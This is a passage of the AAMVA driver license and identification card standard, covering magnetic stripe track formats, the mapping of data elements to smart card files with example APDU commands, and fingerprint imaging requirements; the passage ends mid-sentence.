+2 32 1 0 1 0 0 1 0 R 52 0 1 1 0 0 1 0
+3 33 0 0 1 0 0 1 1 S 53 1 1 1 0 0 1 1
+4 34 1 0 1 0 1 0 0 T 54 0 1 1 0 1 0 0
+5 35 0 0 1 0 1 0 1 U 55 1 1 1 0 1 0 1
+6 36 0 0 1 0 1 1 0 V 56 1 1 1 0 1 1 0
+7 37 1 0 1 0 1 1 1 W 57 0 1 1 0 1 1 1
+8 38 1 0 1 1 0 0 0 X 58 0 1 1 1 0 0 0
+9 39 0 0 1 1 0 0 1 Y 59 1 1 1 1 0 0 1
+: 3A 0 0 1 1 0 1 0 Z 5A 1 1 1 1 0 1 0
+; 3B 1 0 1 1 0 1 1 [ 5B 0 1 1 1 0 1 1
+< 3C 0 0 1 1 1 0 0 \ 5C 1 1 1 1 1 0 0
+= 3D 1 0 1 1 1 0 1 ] 5D 0 1 1 1 1 0 1
+> 3E 1 0 1 1 1 1 0 ^ 5E 0 1 1 1 1 1 0
+? 3F 0 0 1 1 1 1 1 _ 5F 1 1 1 1 1 1 1
+The 14 characters ! “ & ‘ * + , : ; < = > @ _ are available for hardware control purposes and shall not
+be used for information (data content). Applies to track 1 only.
+The 3 characters [ \ ] are reserved for additional national characters when required. They shall not be
+used internationally. Applies to track 1 only.
+The character # is reserved for optional additional graphic symbols. Applies to track 1 only.
+The 3 characters % ^ ? shall have the following meaning:
+% start sentinel
+^ field separator
+? end sentinel
+All 64 characters may be used for information (data content). Applies to track 3 only.
+A. 4 Information content and format
+This standard uses additional characters and a different format for track 3 than what is described in ISO/IEC 7811-6.
+The following tables give the content for each track. This is unique to the AAMVA community and will require
+modifications to the encoding and reading devices used in conjunction with track 3. The ability to implement such
+16
+
+modifications is a mainstay of the magnetic stripe environment and will introduce no significant problem to any
+jurisdiction or to any public or private sector entity wishing to use the magnetic stripe DL/ID card.
+A.4.1 Track 1
+Table A.3 — Track 1 information content and format
+Field Length Length Req’d or Name Information Allowable
+# in (char.) fixed or optional characters
+order variable
+- 82 V-max O Track 1 A/N data in 7 bit binary code for see Table
+state, city, name. A.2 and iv
+1 1 F R Start This character must be encoded %
+sentinel at the beginning of the track.
+2 2 F R State or Mailing or residential code. A-Z, see ii
+Province
+3 13 V-max R City This field shall be truncated with A-Z
+a field separator ^ if less than 13
+characters long. If the city is .-’
+exactly 13 characters long then
+no field separator is used (see space
+i).
+Richfield^
+4 35 V-max R Name Priority is as follows, spaces A-Z
+allowed;
+last name$firstname$title .-’
+This field shall be truncated with
+a field separator ^ if less than 35 space
+characters long. The “$” symbol
+is used as a delimiter between
+names (see i & iii).
+5 29 V R Address The street number shall be as it A-Z
+would appear on mail. The $ is
+used as a delimiter between 0-9
+address lines. This field shall be
+truncated with a field separator .-’
+(or padded with spaces) if less
+than 29 characters long but can space
+be longer (see i).
+28 Atol Av$Suite 2$^
+Hiawatha Park$Apt 2037^
+340 Brentwood Dr.$Fall Estate
+6 1 F R End This character shall be after the ?
+sentinel last data character of the track.
+7 1 F R LRC Longitudinal redundancy check see Table
+is generated from all other A.2
+characters and is the last
+character encoded.
+i Fields 3 and 4 may be shorter than the maximum listed. Total for fields 3,4 and 5 combined is
+77 characters.
+ii Allowable characters are further restricted to those defined in ANSI D-20.
+iii The $ symbol is used for a delimiter rather than the @ symbol as defined in ANSI D-20. There
+is no @ symbol in the 7 bit character set.
+17
+
+Field Length Length Req’d or Name Information Allowable
+# in (char.) fixed or optional characters
+order variable
+iv For Fields 1 through 6 only the following characters from Table A.2 are allowed: A-Z 0-9 $ %
+( ) - . / ^ ? space
+A.4.2 Track 2
+Table A.4 — Track 2 information content and format
+Field Length Length Req’d or Name Information Allowable
+# in (char.) fixed or optional characters
+order variable
+- 40 V-max O Track 2 Numeric data in 5 bit binary see Table
+code for DL number, expiration A.1
+date, birthdate.
+1 1 F R Start This character shall be encoded ;
+sentinel at the beginning of the track.
+2 6 F R ISO IIN This is the assigned 0-9
+identification number from ISO.
+This number shall always begin
+with a “6”.
+This number shall be obtained
+from the AAMVAnet Standards
+Program Director.
+3 13 V-max R DL/ID# This field is used to represent 0-9
+the DL/ID number assigned by
+each jurisdiction.
+Overflow for DL/ID numbers
+longer than 13 characters is
+accommodated in field number
+7.
+4 1 F R Field A field separator must be used =
+Separator after the DL/ID number
+regardless of length.
+18
+
+Field Length Length Req’d or Name Information Allowable
+# in (char.) fixed or optional characters
+order variable
+5 4 F R Expiration This field is in the format: 0-9
+date YYMM
+If MM=77 then license is “non-
+expiring”.
+If MM=88 the Expiration Date is
+at the end of the month One
+Year from the Month (MM) of
+Field 6 and the Year (YY) of
+Field 5 (Expiration Date).
+If MM=99 then the Expiration
+Date is on the Month (MM) and
+Day (DD) of Field 6 (Birthdate)
+and the Year (YY) of Field 5
+(Expiration Date).
+6 8 F R Birthdate This field is in the format: 0-9
+CCYYMMDD
+7 5 V O DL/ID# Overflow for numbers longer 0-9
+overflow than 13 characters. If no
+information is used then a field
+separator is used in this field.
+8 1 F R End This character shall be after the ?
+sentinel last data character of the track.
+9 1 F R LRC Longitudinal redundancy check see Table
+is generated from all other A.2
+characters and is the last
+character encoded.
+Rules governing DL/ID numbering format(s) will be kept by the Issuing DL/ID Agencies. DL/ID
+Numbers containing printed Alpha characters will be represented by two numeric positions for each
+Alpha character on Track 2.
+Example: The character (A) = a numeric (01), character (B) = a numeric (02), character Z = a numeric
+(26).
+A.4.3 Track 3
+Table A.5 — Track 3 information content and format
+Field Length Length Req’d or Name Information Allowable
+# in (char.) fixed or optional characters
+order variable
+- 82 V-max O Track 3 A/N data in 7 bit binary code see Table
+for postal code, class, A.2 and ii
+restrictions.
+1 1 F R Start sentinel This character shall be %
+encoded at the beginning of
+the track.
+2 1 F R Version # This field used to store the 02
+mag stripe version used.
+3 1 F R Security v.# This field used to store the 0-9
+19
+
+Field Length Length Req’d or Name Information Allowable
+# in (char.) fixed or optional characters
+order variable
+security version being used
+(00-63), 00 means no
+security being used.
+4 11 F R Postal code For an 11 digit postal or zip A-Z, 0-9,
+code. (left justify fill with space
+spaces, no hyphen)
+5 2 F R Class Represents the type of DL A-Z, 0-9,
+(ANSI codes modified for space
+CDLIS).See i
+6 10 F R Restrictions See i, iii A-Z, 0-9,
+space
+7 4 F R Endorsements See i, iii A-Z, 0-9,
+space
+8 1 F R Sex M for male, F for female. M,F
+9 3 F R Height See i, iii 0-9, space
+10 3 F R Weight See i, iii 0-9, space
+11 3 F R Hair Color See i, iii A-Z, space
+12 3 F R Eye Color See i, iii A-Z, space
+13 10 V O ID # Discretionary data for use by see Table
+each jurisdiction. A.2
+14 22 V O Reserved Discretionary data for use by see Table
+space each jurisdiction. A.2
+15 5 V O Security Discretionary data for use by see Table
+each jurisdiction. A.2
+16 1 F R End sentinel This character shall be after ?
+the last data character of the
+track.
+17 1 F R LRC Longitudinal redundancy see Table
+check is generated from all A.2
+other characters and is the
+last character encoded.
+i Allowable characters are further restricted to those defined in ANSI D-20.
+ii All 64 characters may be used in data fields; this is different from the ISO use of Table A.2
+coded characters. Special hardware or software may be required for readers and encoders.
+iii If not present pad with spaces.
+A.5 Encoding specifications
+Track locations, start of encoding location, end of encoding location, average bit density, flux transition spacing
+variation, and signal amplitude requirements shall be as described in ISO/IEC 7811-6 for tracks 1, 2, and 3.
+A.6 Error detection
+Inclusion of parity and LRC as described in ISO/IEC 7811-6 is required.
+20
+
+Annex B
+(normative)
+Mapping of driver license/identification card information to integrated circuit(s)
+cards (ICC)
+Introduction
+This annex defines the mapping of the driver license/identification card data elements onto an integrated circuit card
+(ICC). The ICC may be either a contactless ICC or an ICC with contacts.
+This annex defines:
+- physical characteristics of an ICC, in addition to those characteristics specified in ISO/IEC 7810.
+- location and dimensions of the contact or coupling areas,
+- electrical signals to support communications between the ICC and the Interface Device (IFD);
+- transmission protocols and answer to reset;
+- command set;
+- the file structure for the driver license/identification card application; and
+- the data element mappings to the files.
+All these requirements are aligned with the ISO/IEC standards for integrated circuit cards. There is one form of ICC
+with contacts and there are three forms of contactless ICCs. All are defined the respective groups of standards:
+ISO/IEC 7816 Identification cards - Integrated circuit(s) cards with contacts
+ISO/IEC 10536 Identification cards - Contactless integrated circuit(s) cards - Closely coupled cards
+ISO/IEC 14443 Identification cards - Contactless integrated circuit(s) cards - Proximity cards
+ISO/IEC 15693 Identification cards - Contactless integrated circuit(s) cards - Vicinity cards
+This annex defines the card structure and commands to be used when the ICC card is in operation (used by the
+cardholder) but does not address the means used to manufacture or issue such a card. The issuance phases
+(initialization, personalization, distribution) are beyond the scope of this standard.
+Note The choice of technologies may affect interoperablity of the ICC, especially with POS systems that have
+already been installed. The use the technologies defined in ISO/IEC 10536 and ISO/IEC 15693 may not be
+appropriate for that environment.
+21
+
+B.2 Physical characteristics
+The physical characteristics of the ICC shall adhere to the physical characteristics specified in the standard for the
+respective type of card.
+B.3 Location and dimensions of coupling areas
+The location and dimension of the contact or coupling areas of the ICC shall adhere to the location and dimension
+specified in the standard for the respective type of card.
+B.4 Electronic signals
+The electronic signals and reset procedures are given in the standard for the respective type of card.
+B.5 Transmission protocols and answer to reset
+B.5.1. Transmission protocols
+The driver license/identification card may support a variety of protocols in accordance with the standard for the
+respective type of card. Both the IFD and the ICC shall support at least the protocol T = 0 (see ISO/IEC 7816-3).
+Other protocols that may be used are defined in the respective standards.
+B.5.2. Answer to reset
+The answer to reset shall adhere to the answer to reset specified in the standard for the respective type of card. A
+contact ICC shall not specify a separate programming voltage. The use of historical bytes in the answer to reset is a
+vendor option, but shall be in compliance with the respective standard.
+B.6 Application selection
+ICCs may support more than one application. The driver license application shall be the default application if none is
+selected. There may be only one active driver license application in the ICC.
+The driver license application shall be selected by use of the Application Identification (AID) as a reserved DF name.
+The AID shall consist of the Registered Application Identifier (RID) assigned by ISO according to ISO/IEC 7816-5.
+The AID shall not contain a Proprietary Application Identifier Extension (PIX). The RID is ‘A0 00 xx xx xx’.
+B.7 File structure
+Information on an ICC is stored in a file system defined in ISO/IEC 7816-4. The card file system is organized
+hierarchically into dedicated files (DFs) and elementary files (EFs). Dedicated files (DFs) contain elementary files or
+other dedicated files. A master file (MF) is the root of the file system.
+One DF as defined by this specification contains driver license information about the cardholder. The DF has the name
+‘A0 00 xx xx xx’ for the application (the registered AID) and is selected by this name. It can be placed anywhere in the
+DF tree attached to the MF of the card, including the MF itself.
+22
+
+The EFs defined by this specification store the driver license/identification information elements in a record structure.
+The records contain specific data elements as described in B.9. The Issuer file contains the control data elements for
+the issuing authority. The License data file contains the data elements for the driver license. The Photo file contains
+the digitized photo image if present. The issuer may use additional files for other information as desired. Additional
+security controls may be placed these additional files as desired.
+B.8 Command set
+The commands to be supported by the driver license/identification card are as follows:
+- SELECT FILE by DF name (full name) to select the application
+- READ RECORD by short EF identifier with a specified record number
+These commands, formats, and their return codes are defined in ISO/IEC 7816-4. When a READ RECORD command
+is issued to the card on a file that does not exist (e.g., optional files) or that is not accessible (see clause B.10 on
+security), the card will return an error code according to ISO/IEC 7816-4.
+Example of application selection
+The application shall be selected by use of the following parameters for the APDU.
+CLA ‘00’
+INS ‘A4’
+P1 ‘04’ – (select by DF name – the AID)
+P2 ‘00’
+L ‘05’ – (length of AID)
+c
+Data field ‘A0 00 xx xx xx’ – (the AID)
+L ‘00’ – return the application label if present
+e
+The response data field contains the application label. The label shall be ‘Driver License’.
+23
+
+Example of reading a record from a file
+The READ command shall be used to access a specific record number. This example reads record number one from
+the issuer file that is known by the short file identifier ’01.’ The APDU parameters for this action are shown below.
+CLA ‘00’
+INS ‘B2’
+P1 ‘01’ - specifies record number one
+P2 ‘0C’ - read by record number from SFI ‘01’
+L Empty
+c
+Data field Empty
+L 0 - specifies to read the entire record
+e
+The response data field contains the record.
+B.9 File contents
+This clause defines the mapping of the machine-readable information elements defined in clause 6. The files contain
+the data elements as data objects within specific records. The structure and coding of data objects are defined in
+ISO/IEC 7816-4 and 7816-6. Each data object has an identification tag that is specified in hexadecimal coding (for
+example, ‘5A’). Standard tags are used wherever possible. The tags defined in this standard use the proprietary
+coding option with tag values from ‘C0’ to ‘DF20’. Each data object has a unique tag, a length and a value. The data
+objects that may be present in a file are identified as mandatory (M) or optional (O). The definitions contain the
+specific reference to the data element number defined in clause 6.
+This definition provides for two additional data elements that are not available with magnetic stripe or bar code
+technologies. These elements provide for the storage of a digitized photographic image (tag ‘5F40C’) and a digitized
+handwritten signature image (tag ‘5F43’) as defined in ISO/IEC 7816-6. These data elements are stored in a separate
+file since they may require the reading of multiple records to obtain the data.
+B.9.1. EF (Issuer Information) SFI ‘01’
+ISSUER
+This EF contains the identity of the issuer of the driver license/identification card and any information related to the
+issuing of the driver license. The identity of the issuer in the United States is defined by the ISO IIN assigned to each
+state and is in data object ’42.’ In anticipation of use by other countries, the record may contain the country code of
+the issuer in data object ‘41’ instead. (See ISO/IEC 7816-6 for additional information.) The data objects defined below
+will be read as the first record in the file. Additional records with other data objects may be present in the file at the
+issuer’s discretion. These records are beyond the scope of this standard.
+The maximum size of this record is 127 bytes.
+24
+
+Short EF Identifier: '01'H Structure: Record Mandatory EF
+Tag Description M/O Length Char Set Data Element
+‘42’ Issuer Identification Number M Fixed - 6 N 15
+‘44’ Application Version Number M Fixed - 2 N n/a
+‘DF00’ Security Version Number M Fixed - 2 N n/a
+‘5A’ Driver License/ID Number M Var - 25 N or AN 6 (and 7)
+‘5F25’ Issue Date M Fixed – 8 AN 14
+‘DF0C’ Issue Timestamp O Var - 26 N 45
+‘DF0D’ Number of Duplicates O Fixed - 2 N 46
+‘DF08’ Unique Customer Identifier O Var - 25 AN 50
+B.9.2. EF (Driver License data) SFI ‘02’
+DL
+This EF contains the required and optional data elements for the cardholder as data objects in fixed content records.
+The mapping of data objects to records is specified below. The contents and maximum sizes of these records are:
+Record number Contents Maximum size
+1 Mandatory data elements 201
+2 Personal characteristics 192
+3 Permit data elements, 186
+Residence address and mailing
+address
+4 ‘AKA’ data elements 189
+25
+
+The file is variable length and may contain additional records. The file must contain at least one record, the mandatory
+data elements.
+B.9.2.1 Record 1 – mandatory data elements
+Short EF Identifier: '02'H Structure: Record Mandatory EF
+Tag Description M/O Length Char Set Data Element
+‘42’ Issuer Identification Number M Fixed - 6 N 15
+‘5A’ Driver License/ID Number M Var - 25 AN 6 (and 7)
+’5F20’ Driver License Name M Var - 35 AS 1
+’5F42’ Driver Address M Var - 29 ANS 2
+’D7’ Driver Mailing City M Var - 15 AS or AN 3
+‘D8’
+Driver Mailing Jurisdiction Code M Fixed - 2 AN 4
+‘D9’
+Driver Mailing Postal Code M Fixed - 11 ANS 5
+‘C0’
+Driver License Classification M F ixed - 4 AN 8
+Code
+‘C1’
+Driver License Restriction Code M F ixed - 10 AN 9
+‘C2’
+Driver License Endorsement M F ixed - 5 AN 10
+Code
+‘5F24’
+Driver License Expiration Date M F ixed - 8 N 11
+‘5F2B’
+Date of Birth M F ixed - 8 N 12
+‘5F35’
+Driver Sex M F ixed - 1 N 13
+‘5F26’
+Driver License or ID Document M F ixed - 8 N 14
+Issue Date
+26
+
+B.9.2.2 Record 2 – personal characteristics
+Short EF Identifier: '02'H Structure: Record Mandatory EF
+Tag Description M/O Length Char Set Data Element
+‘CA’
+Height (FT/IN) O Fixed - 3 N 20
+or
+or
+‘DF0A’
+Height (CM) 43
+‘CB’ Weight (LBS) O Fixed - 3 N 21
+or or
+‘DF0B’ Weight (KG) 44
+‘CC’ Eye Color O Fixed - 3 N 22
+‘CD’ Hair Color O Fixed - 3 N 23
+‘D0’ Driver Last Name O Var – 35 AN 31
+‘D1’ Driver First Name O Var – 35 AN 32
+‘D2’ Driver Middle Name or Initial O Var – 35 AN 33
+‘D3’ Driver Name Suffix O Fixed – 3 AN 34
+‘D4’ Driver Name Prefix O Fixed – 5 AN 35
+‘C9’
+Social Security Number O Fixed – 9 N 24
+‘DF06’
+Medical Indicator/Codes O Var – 20 AN 47
+‘DF07’
+Organ Donor O Fixed – 10 AN 48
+27
+
+B.9.2.3 Record 3 – permit data elements, residence address and mailing address
+Short EF Identifier: '02'H Structure: Record Mandatory EF
+Tag Description M/O Length Char Set Data Element
+‘C3’ Driver Permit Classification O
+Code
+F ixed - 2 A 2 5
+‘C4’ Driver Permit Expiration Date
+O F ixed - 8 N 2 6
+‘C5’ Permit Identifier
+O F ixed - 25 AN 2 7
+‘C6’ Driver Permit Issue Date
+O F ixed - 8 N 2 8
+‘C7’
+Driver License Restriction Code O F ixed - 10 AN 2 9
+‘C8’
+Driver License Endorsement O F ixed - 6 AN 3 0
+Code
+‘D5’
+Driver Mailing Street Address 1 O V ar – 20 AN 36
+‘D6’
+Driver Mailing Street Address 2 O V ar – 20 AN 37
+‘DA’
+Driver Residence Street O V ar – 20 AN 38
+Address 1
+‘DB’
+Driver Residence Street O V ar – 20 AN 39
+Address 2
+‘DC’
+Driver Residence City O V ar – 15 AN 40
+‘DD’
+Driver Residence Jurisdiction O F ixed - 2 AN 41
+Code
+‘DE’
+Driver Residence Postal Code O F ixed - 11 AN 42
+‘CE’
+Non-Resident Indicator O Fixed - 1 A 49
+28
+
+B.9.2.4 Record 4 – “AKA” data elements
+Short EF Identifier: '02'H Structure: Record Mandatory EF
+Tag Description M/O Length Char Set Data Element
+‘DF2B’
+Driver "AKA" Date of Birth O Fixed - 8 N 51
+‘DF09’
+Driver "AKA" Social Security O Fixed - 9 N 52
+Number
+‘DF20’
+Driver "AKA" Name O Var – 35 AN 53
+‘DF01’
+Driver "AKA" Last Name O Var – 35 AN 54
+‘DF02’
+Driver "AKA" First Name O Var – 35 AN 55
+‘DF03’
+Driver "AKA" Middle Name or O Var – 35 AN 56
+Initial
+‘DF04’
+Driver "AKA" Name Suffix O Fixed - 3 AN 57
+‘DF05’
+Driver "AKA" Name Prefix O Fixed - 5 AN 58
+B.9.3 EF (Magnetic Stripe Information) SFI ‘03’
+MAG
+This EF contains the image of the data contained in the magnetic stripe(s) All driver license information contained in a
+magnetic stripe shall be stored in this file. Any combination of the three tracks on the magnetic stripe may be present.
+The data shall be written in ASCII character coding structure. The data objects exclude the special characters used for
+start sentinel, end sentinel and LRC.
+The maximum size of this record is 201 bytes.
+Note The use of this data format should be maintained until the use of the magnetic stripe has been completely
+phased out and all interface devices (terminals) have been revised to use only the data in EF or EF . This format
+DL ISSUER
+may be needed during the lengthy transition process and migration to the use of the ICC in place of the magnetic
+stripe.
+29
+
+Short EF Identifier: '03'H Structure: Record Mandatory EF
+Tag Description M/O Length Char Set Data Element
+‘56’ Track 1 in ASCII O Var – 79 ANS Track 1
+‘57’ Track 2 in ASCII O Var – 37 N Track 2
+‘58’ Track 3 in ASCII O Var - 79 AN Track 3
+B.9.4 EF (Digitized Portrait Image) SFI ‘04’
+POR
+This EF contains the digitized image of the cardholder’s portrait image. This data element is contained in a
+cardholder image template ‘6C.’ Use of the template code is optional. See ISO/IEC 7816-6 for a more detailed
+description of additional data elements that may be in the template. Since the data element may be large, multiple
+READ RECORD commands may have to be issued to obtain the full record. See ISO/IEC 7816-4 for more
+information.
+Short EF Identifier: '04'H Structure: Record Mandatory EF
+Tag Description Length Char Set Data Element
+M/O
+‘6C’ Template for digitized image O Var B N/a
+information
+‘5F40’ Portrait image O Var B N/a
+(See ISO/IEC 10918-1)
+B.9.5 EF (Digitized Handwritten Signature Image) SFI ‘05’
+SIG
+This EF contains the digitized image of the cardholder’s handwritten signature. This data element is contained in a
+cardholder image template ‘6C.’ Use of the template code is optional. See ISO/IEC 7816-6 for a more detailed
+description of additional data elements that may be in the template. Since the data element may be large, multiple
+READ RECORD commands may have to be issued to obtain the full record. See ISO/IEC 7816-4 for more
+information.
+Short EF Identifier: '05'H Structure: Record Mandatory EF
+30
+
+Tag Description Length Char Set Data Element
+M/O
+‘6C’ Template for digitized image O Var B N /a
+information
+‘5F43’ Handwritten signature image O Var B N /a
+(see ISO/IEC 11544)
+B.10 Security
+lCCs can be used to secure and protect the information they contain. For example, because of privacy issues, an
+issuer may decide to restrict the access of some information stored in the card to the cardholder and may require a
+PIN for authentication. This standard does not impose any security structure. This standard does acknowledge the
+fact that security restrictions imposed by a given issuer may induce the IC card to reject a command when used in an
+incorrect security context (e.g., UPDATE RECORD of a file protected against modification such as the Issuer Number
+EF). A security scheme version number may be specified in the data file with the issuer information, EF .
+ISSUER
+Some of the optional data elements may require more security. These data elements may be placed in other files,
+with separate security constraints for each file. The recommended technique is to use the record structures defined
+above in another EF with the next available short file identifier: '06'H, '07'H, etc.
+The magnetic stripe data in EF should not be encrypted and it should be available to be read by any interface
+MAG
+device. The data in EF should be updated only by the issuer.
+MAG
+The portrait and handwritten signatures images should not be encrypted and should be available to be read by any
+interface device. The data in EF and EF should be written once by the issuer. The security risks coincident with
+POR SIG
+the ability to update these images should be carefully considered by the issuer. It is recommended that the card be
+reissued if this data must be changed.
+31
+
+B.11 Data element tags
+Ref. # Data element/label Tag SFI Record
+1 Driver License Name ‘5F20’ ‘02’ 1
+2 Driver Address ‘5F42’ ‘02’ 1
+3 Driver Mailing City ‘D7’ ‘02’ 1
+4 Driver Mailing Jurisdiction Code ‘D8’ ‘02’ 1
+5 Driver Mailing Postal Code ‘D9’ ‘02’ 1
+6 Driver License/ID Number ‘5A’ ‘01’ 1
+‘02’ 1
+7 ID/DL # * - - -
+8 Driver License Classification Code ‘C0’ ‘02’ 1
+9 Driver License Restriction Code ‘C1’ ‘02’ 1
+10 Driver License Endorsement Code ‘C2’ ‘02’ 1
+11 Driver License Expiration Date ‘5F24’ ‘02’ 1
+12 Date of Birth ‘5F2B’ ‘02’ 1
+13 Driver Sex ‘5F35’ ‘02’ 1
+14 Driver License or ID Document Issue Date ‘5F26’ ‘02’ 1
+15 ISO Issuer Identifier Number (IIN) ‘42’ ‘01’ 1
+‘02’ 1
+16 Driver License or Identification Card Identifier ‘4F’ DF
+name
+17 Color Photograph or Image ‘5F40’ ‘04’ Multiple
+template ‘6C’
+18 Signature ‘5F43’ ‘05’ multiple
+template ‘6C’
+19 Security Features ** - - -
+32
+
+Ref. # Data element/label Tag SFI Record
+20 Height (FT/IN) ‘CA’ ‘02’ 2
+21 Weight (LBS) ‘CB’ ‘02’ 2
+22 Eye Color ‘CC’ ‘02’ 2
+23 Hair Color ‘CD’ ‘02’ 2
+24 Social Security Number ‘C9’ ‘02’ 2
+25 Driver Permit Classification Code ‘C3’ ‘02’ 3
+26 Driver Permit Expiration Date ‘C4’ ‘02’ 3
+27 Permit Identifier ‘C5’ ‘02’ 3
+28 Driver Permit Issue Date ‘C6’ ‘02’ 3
+29 Driver Permit Restriction Code ‘C7’ ‘02’ 3
+30 Driver Permit Endorsement Code ‘C8’ ‘02’ 3
+31 Driver Last Name ‘D0’ ‘02’ 2
+32 Driver First Name ‘D1’ ‘02’ 2
+33 Driver Middle Name or Initial ‘D2’ ‘02’ 2
+34 Driver Name Suffix ‘D3’ ‘02’ 2
+35 Driver Name Prefix ‘D4’ ‘02’ 2
+36 Driver Mailing Street Address 1 ‘D5’ ‘02’ 3
+37 Driver Mailing Street Address 2 ‘D6’ ‘02’ 3
+38 Driver Residence Street Address 1 ‘DA’ ‘02’ 3
+39 Driver Residence Street Address 2 ‘DB’ ‘02’ 3
+40 Driver Residence City ‘DC’ ‘02’ 3
+41 Driver Residence Jurisdiction Code ‘DD’ ‘02’ 3
+42 Driver Residence Postal Code ‘DE’ ‘02’ 3
+43 Height (CM) ‘DF0A’ ‘02’ 2
+44 Weight (KG) ‘DF0B’ ‘02’ 2
+45 Issue Timestamp ‘DF0C’ ‘01’ 1
+33
+
+Ref. # Data element/label Tag SFI Record
+46 Number of Duplicates ‘DF0D’ ‘01’ 1
+47 Medical Indicator/Codes ‘DF06’ ‘02’ 2
+48 Organ Donor ‘DF07’ ‘02’ 2
+49 Non-Resident Indicator ‘CE’ ‘02’ 3
+50 Unique Customer Identifier ‘DF08’ ‘01’ 1
+51 Driver "AKA" Date Of Birth ‘DF2B’ ‘02’ 4
+52 Driver "AKA" Social Security Number ‘DF09’ ‘02’ 4
+53 Driver "AKA" Name ‘DF20’ ‘02’ 4
+54 Driver "AKA" Last Name ‘DF01’ ‘02’ 4
+55 Driver "AKA" First Name ‘DF02’ ‘02’ 4
+56 Driver "AKA" Middle Name ‘DF03’ ‘02’ 4
+57 Driver "AKA" Suffix ‘DF04’ ‘02’ 4
+58 Driver "AKA" Prefix ‘DF05’ ‘02’ 4
+Magnetic Stripe Track 1 ‘56’ ‘03’ 1
+Magnetic Stripe Track 3 ‘57’ ‘03’ 1
+Magnetic Stripe Track 3 ‘58’ ‘03’ 1
+Application version number ‘44’ ‘01’ 1
+Security version number ‘DF00’ ‘01’ 1
+* The driver license number extension is included in element 6.
+** The smart card provides its own security features.
+34
+
+Annex C
+(normative)
+Finger imaging
+Introduction
+This annex defines standards to ensure interoperability in the collection and use of finger imaging with driver license
+and identification cards.
+C.1 Conformance
+The use of finger imaging and finger image data with driver license and identification cards shall comply with the
+following: ANSI/NIST-CSL1-1993, CJIS/FBI IAFIS-IC-0110, and CJIS-RS-0010, BioAPI Specification Version 1.00,
+The BioAPI Consortium, March 30, 2000.
+C.2 Application Definitions
+C.2.1 Verification
+A one-to-one comparison of the currently collected finger image with a previously collected finger image associated
+with the claimed identity being verified. The previously collected finger image may be either retrieved from a database
+or placed in machine readable form on the card.
+C.2.2 Search
+A one-to-many comparison on a database to determine the unknown identity of the individual being processed or to
+determine uniqueness of the individual being enrolled to ensure one identity per person. This process reduces the
+possibility of one person having multiple identities in the database.
+C.2.3 Core
+The approximate center of the fingerprint pattern as defined for the various pattern types.
+C.3 Finger Selection
+A Driver License or Identification Card shall include biometric data collected from a minimum of two fingers. Selection
+of fingers collected shall be in the following order:
+1) Left Fore (Index)
+2) Right Fore (Index)
+3) Left Thumb
+4) Right Thumb
+35
+
+5) Left Middle
+6) Right Middle
+7) Left Ring
+8) Right Ring
+9) Left Little
+0) Right Little
+Figure C.1 — Finger Selection
+If an individual is missing the selected finger, the next finger in this order shall be used. Where usable finger images
+are not available, this shall be noted in the record describing the hand configuration.
+C.4 Image Quality
+There are two factors in collecting quality finger images: the collection device performance and the actual quality of
+each image collection in terms of repeatability and consistency needed for successful matching processes.
+C.4.1 Finger Image Collection Device
+Finger live-scan collection devices shall conform to CJIS-RS-0010 Appendix G. This specification sets performance
+standards on finger image scanners for resolution, geometric image accuracy, modulation transfer function, signal-to-
+noise ratio, grayscale range, grayscale linearity, and grayscale uniformity.
+C.4.2 Finger Image Collection Result
+The imaging of the finger pattern shall result in an image in which the core of the pattern is positioned within 25% of
+the image center. The ridge pattern shall be clearly visible (smudge-free) with differentiable ridges and valleys for the
+entire area around the core.
+C.5 Compression
+If compression is used it shall be Criminal Justice Information Services CJIS/FBI IAFIS-IC-0110 Wavelet Scalar
+Quantization (WSQ). The average compression ratio applied using WSQ shall not be greater than 15:1.
+36
+
+C.6 Data Format
+Finger image data shall be interchanged between jurisdictions using the data format specified in ANSI/NIST-CSL1-
+1993 “Data Format for the Interchange of Fingerprint Information”. The configuration of the data shall include Record
+type1 Transaction information, record type 2 User-Defined Text, and record type 4 Fingerprint image data (high-
+resolution grayscale).
+NOTE Because different AFIS use minutiae and potentially use other features extracted from the finger image to improve
+speed and performance, interchange between jurisdictions shall be accomplished using finger images, not minutiae data, so that
+the best possible matching performance can be achieved.
+C.7 Minutiae Extraction Introduction
+This section of the Annex provides interoperability between different finger matchers for the purposes of one-to-one
+verification of an individual’s identity against a previously collected and stored finger record. The interoperability is
+based on defining the finger minutiae extraction rules and record format that are common to most all finger matchers
+for acceptable matching accuracy, while allowing for proprietary data to be attached so that the highest accuracy can
+be maintained for matching accomplished with the same matcher type.
+C.8 External Standards Referenced
+BioAPI Specification Version 1.00, The BioAPI Consortium, March 30, 2000
+C.9 Definitions
+C.9.1
+Filtering
+partitioning a database through the use of exogenous information about the user not discernible from the biometric
+patterns, such as sex, age or race
+C.9.2
+Friction Ridge
+The ridges present on the skin of the fingers and toes, the palms and soles of the feet, which makes contact with an
+incident surface under normal touch. On the fingers, the unique patterns formed by the friction ridges make up
+fingerprints.
+C.9.3
+Live-Scan Print
+a fingerprint image that is produced by scanning or imaging a live finger to generate an image of the friction ridges
+C.9.4
+Minutia (single)
+Minutiae (pl)
+Friction ridge characteristics that are used to individualize a fingerprint. Minutiae occur at points where a single friction
+ridge deviates from an uninterrupted flow. Deviation may take the form of ending, division, or immediate origination
+and termination.
+C.9.5
+Resolution
+the number of pixels (picture elements) per unit distance in the image of the fingerprint
+37
+
+C.9.6
+Ridge Ending
+The point at which a friction ridge terminates or, alternatively, begins. A ridge ending is surrounded on three sides by
+valley.
+C.9.7
+Ridge Bifurcation
+the point at which a friction ridge splits into two ridges or, alternatively, where two separate friction ridges combine into
+one
+C.9.8
+Valley
+the area surrounding a friction ridge, which does not make contact with an incident surface under normal touch
+C.10 Minutiae Description
+C.10.1 Principle
+Establishment of a common feature-based representation must rest on agreement on the fundamental notion for
+representing a fingerprint. A significant number of technology providers follow a traditional approach of encoding a
+fingerprint through location of “minutia” points. These minutiae are points located at the places in the fingerprint image
+where friction ridges end or split into two ridges. Describing a fingerprint in terms of the location and direction of these
+ridge endings and splits provides sufficient information to reliably determine whether two fingerprint records are from
+the same finger.
+Fingerprint images can be represented with “light ridges” or “dark ridges”. The minutia points shall be located in such a
+way that the points and their directions do not change when the light and dark polarity of the image is inverted. This
+decision not only provides for consistent data extraction regardless of image polarity, but also ensures equal behavior
+of ending and bifurcation points with respect to image degradations such as noise and contrast variance. The
+specifications of minutia location and minutia direction described below accomplish this. See Figure C.2 for an
+illustration of the definitions below.
+C.10.2 Minutia Type
+Each minutia point has a “type” associated with it. There are two major types of minutia: a “ridge ending” and a “ridge
